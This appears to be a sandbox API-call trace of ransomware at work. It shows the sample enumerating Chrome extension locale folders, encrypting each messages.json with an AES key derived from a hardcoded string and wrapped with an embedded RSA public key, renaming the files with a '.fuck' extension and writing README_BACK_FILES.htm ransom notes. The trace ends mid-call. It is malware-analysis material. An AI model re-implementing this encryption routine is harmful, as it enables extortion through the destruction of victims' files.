[0249.041] AreFileApisANSI () returned 1 [0249.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0249.041] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.042] GetFileType (hFile=0x5d54) returned 0x1 [0249.042] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0249.043] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.043] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0249.043] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.043] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.044] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0249.044] GetLastError () returned 0x0 [0249.044] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json")) returned 0x20 [0249.045] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json", dwFileAttributes=0x80) returned 1 [0249.045] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0249.046] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0249.046] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0249.046] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293dde8) returned 1 [0249.049] CryptCreateHash (in: hProv=0x293dde8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0249.049] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0249.049] CryptHashData (hHash=0x2938978, pbData=0x28cb2d8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.049] CryptDeriveKey (in: hProv=0x293dde8, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29378b8) returned 1 [0249.049] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.049] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0249.049] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293d1b0) returned 1 [0249.050] CryptImportPublicKeyInfo (in: hCryptProv=0x293d1b0, dwCertEncodingType=0x1, pInfo=0x2931b60*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2931b90*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2931b98*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29374b8) returned 1 [0249.050] CryptEncrypt (in: hKey=0x29374b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0249.050] CryptEncrypt (in: hKey=0x29374b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293d238*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293d238*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0249.050] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293d238*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293d238*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0249.051] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x104, lpOverlapped=0x0) returned 1 [0249.052] CryptEncrypt (in: hKey=0x29378b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x104, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0249.052] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0249.052] CloseHandle (hObject=0x5d58) returned 1 [0249.053] CloseHandle (hObject=0x5d5c) returned 1 [0249.053] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json"), bFailIfExists=0) returned 1 [0249.056] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json", dwFileAttributes=0x0) returned 1 [0249.057] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json.gsg")) returned 1 [0249.058] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json.fuck")) returned 1 [0249.059] CryptDestroyHash (hHash=0x2938978) returned 1 [0249.059] CryptDestroyKey (hKey=0x29378b8) returned 1 [0249.059] CryptReleaseContext (hProv=0x293dde8, dwFlags=0x0) returned 1 [0249.059] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0249.059] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0249.059] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\readme_back_files.htm")) returned 0xffffffff [0249.060] AreFileApisANSI () returned 1 [0249.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3700, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0249.060] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.060] GetFileType (hFile=0x5d54) returned 0x1 [0249.060] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0249.062] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.062] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0249.062] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.062] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.062] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0249.062] GetLastError () returned 0x0 [0249.062] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_gb\\messages.json")) returned 0x20 [0249.063] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json", dwFileAttributes=0x80) returned 1 [0249.063] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0249.064] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_gb\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0249.065] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0249.065] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293dde8) returned 1 [0249.068] CryptCreateHash (in: hProv=0x293dde8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0249.068] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0249.068] CryptHashData (hHash=0x2938978, pbData=0x28cb5a8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.068] CryptDeriveKey (in: hProv=0x293dde8, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2937638) returned 1 [0249.068] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.068] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0249.068] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293d2c0) returned 1 [0249.069] CryptImportPublicKeyInfo (in: hCryptProv=0x293d2c0, dwCertEncodingType=0x1, pInfo=0x2930d90*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2930dc0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2930dc8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937ab8) returned 1 [0249.069] CryptEncrypt (in: hKey=0x2937ab8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0249.069] CryptEncrypt (in: hKey=0x2937ab8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293d348*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293d348*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0249.069] WriteFile (in: hFile=0x5d58, lpBuffer=0x293d348*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293d348*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0249.070] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0249.071] CryptEncrypt (in: hKey=0x2937638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0249.071] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0249.072] CloseHandle (hObject=0x5d5c) returned 1 [0249.072] CloseHandle (hObject=0x5d58) returned 1 [0249.072] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_gb\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_gb\\messages.json"), bFailIfExists=0) returned 1 [0249.075] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json", dwFileAttributes=0x0) returned 1 [0249.076] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_gb\\messages.json.gsg")) returned 1 [0249.077] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_gb\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_gb\\messages.json.fuck")) returned 1 [0249.078] CryptDestroyHash (hHash=0x2938978) returned 1 [0249.078] CryptDestroyKey (hKey=0x2937638) returned 1 [0249.078] CryptReleaseContext (hProv=0x293dde8, dwFlags=0x0) returned 1 [0249.078] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0249.078] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0249.078] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_gb\\readme_back_files.htm")) returned 0xffffffff [0249.078] AreFileApisANSI () returned 1 [0249.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0249.079] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_gb\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.079] GetFileType (hFile=0x5d54) returned 0x1 [0249.079] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0249.080] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.080] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0249.081] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.081] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.081] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0249.081] GetLastError () returned 0x0 [0249.081] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_us\\messages.json")) returned 0x20 [0249.082] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json", dwFileAttributes=0x80) returned 1 [0249.082] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_us\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0249.083] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_us\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0249.083] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0249.084] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293d3d0) returned 1 [0249.087] CryptCreateHash (in: hProv=0x293d3d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0249.087] lstrlenA 